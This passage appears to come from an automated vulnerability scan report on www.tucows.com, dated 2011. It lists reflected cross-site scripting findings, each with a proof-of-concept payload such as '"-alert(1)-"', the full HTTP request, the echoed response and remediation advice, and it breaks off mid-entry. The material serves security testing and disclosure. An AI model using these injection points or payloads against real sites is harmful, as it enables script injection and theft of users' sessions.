The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2cd8d"><script>alert(1)</script>19ee22f0cfb was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /preview/194850/x222cd8d"><script>alert(1)</script>19ee22f0cfb HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 46b7e"-alert(1)-"8990b025cf5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /preview/194850/x2246b7e"-alert(1)-"8990b025cf5 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
3.380. http://www.tucows.com/preview/194850/x22 [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.tucows.com
Path:
/preview/194850/x22
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8153d"-alert(1)-"891c6dec5da was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /preview/194850/x22?8153d"-alert(1)-"891c6dec5da=1 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a3ab0"-alert(1)-"6b16cc9a4b3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /privacy.htmla3ab0"-alert(1)-"6b16cc9a4b3 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:29:14 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
3.382. http://www.tucows.com/privacy.html [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.tucows.com
Path:
/privacy.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2e4b0"-alert(1)-"dc8c1805ae was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /privacy.html?2e4b0"-alert(1)-"dc8c1805ae=1 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:28:44 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 36886
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Tucows Download</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9edf7"-alert(1)-"26f2d744f54 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /sitemap.html9edf7"-alert(1)-"26f2d744f54 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:33:14 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
3.384. http://www.tucows.com/sitemap.html [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.tucows.com
Path:
/sitemap.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 95630"-alert(1)-"ad45798eea4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /sitemap.html?95630"-alert(1)-"ad45798eea4=1 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:31:35 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 284587
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Tucows Download</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6930b"-alert(1)-"88848db90c4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /software.html6930b"-alert(1)-"88848db90c4 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:28:14 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
3.386. http://www.tucows.com/software.html [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.tucows.com
Path:
/software.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 89730"-alert(1)-"ede5d633695 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /software.html?89730"-alert(1)-"ede5d633695=1 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:27:49 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 49601
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Download Windows Fre ...[SNIP]... <script> loggedIn = false;
The value of the pf request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 36557"-alert(1)-"b121e4a791 was submitted in the pf parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /software.html?t=689&pf=win36557"-alert(1)-"b121e4a791 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:28:00 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 55803
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Download Windows Fre ...[SNIP]... <script> loggedIn = false;
The value of the t request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d91d8"-alert(1)-"32c743300b4 was submitted in the t parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /software.html?t=689d91d8"-alert(1)-"32c743300b4&pf=win HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 21:27:44 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVDWt9eDsgAvDivKt0Eex6B0RPBHeE1vxYfjLZMpBZlW7bjlV79Z3QWdkzy6r7qpr%2BTJUX7x9ThxdXpMo6KMFZWyrMA2IUCivRn8fEr2dY2En; path=/ Connection: close Content-Type: text/html Content-Length: 55720
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Download Windows Fre ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fc4ae"-alert(1)-"f753e1f604a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /terms.htmlfc4ae"-alert(1)-"f753e1f604a HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:29:25 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
3.390. http://www.tucows.com/terms.html [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.tucows.com
Path:
/terms.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2ed39"-alert(1)-"d3cf4b9dbed was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /terms.html?2ed39"-alert(1)-"d3cf4b9dbed=1 HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 21:28:53 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html Content-Length: 38731
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Tucows Download</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 436cb"-alert(1)-"c0ec75e5035 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /videoegg436cb"-alert(1)-"c0ec75e5035/ad.html HTTP/1.1 Host: www.tucows.com Proxy-Connection: keep-alive Referer: http://www8.tucows.com/delivery/afr.php?zoneid=187&cb=6253c4ae Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmc=163973946; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utmb=163973946; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:23:02 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 32007
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 97844"-alert(1)-"e3ce1315cea was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
